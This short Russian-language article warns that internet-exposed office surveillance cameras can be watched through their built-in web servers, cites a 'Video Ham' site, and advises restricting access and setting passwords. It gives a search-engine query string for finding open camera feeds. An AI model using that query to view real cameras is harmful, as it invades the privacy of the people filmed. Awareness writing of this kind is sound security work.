Камеры слежения, которые становятся обязательным атрибутом практически любого предприятия, могут таить в себе опасность и вместо усиления системы безопасности служить ее разрушителем. Все дело в том, что зачастую они подключаются к корпоративной сети компаний по IP-протоколу и имеют прямой выход в Интернет. Функционал камеры позволяет просматривать изображение с нее при помощи обычного браузера, так как само устройство уже имеет встроенный веб-сервер. Это удобное изобретение, позволяющее экономить на экранах слежения, может привести к серьезным последствиям, если вовремя не подумать об ограничении такой «свободы слова».
Консультант по вопросам информационной безопасности Роберт Шифрен (Robert Schifreen) создал сайт www.defeatingthehacker.com/videoham/ на котором подробно описал процесс поиска и подключения к открытым камерам слежения. Явление даже получило свое название в Интернете — Video Ham (в английском языке слово ham помимо «ветчины» имеет еще значение «радиолюбитель»).
Сама процедура поиска проста и доступна каждому любопытному пользователю — нужно лишь найти страницы, в адресе которых содержится подстрока «CgiStart? page=Single», на такой запрос Google сразу выдал нам несколько десятков ссылок, среди которых действительно нашлось немало снимков с камер слежения, расположенных в офисных помещениях. Вряд ли владельцы компаний мечтали о том, что за их сотрудниками будет «присматривать» автор российского интернет-журнала.
При всей серьезности проблемы, обеспечить безопасность крайне просто. Во-первых, нужно ограничить доступ к веб-камере корпоративной локальной сетью, исключив IP-адреса внешнего Интернета, во-вторых, необходимо установить пароль на просмотр изображений с камеры. При соблюдении этих несложных правил никакие скучающие пользователи не смогут нанести в ваш дом или офис нежданный визит, пусть даже и виртуальный.

Файл 7f5ddbf668be432bbaf47f6ed1d47c4b/sape.php не найден!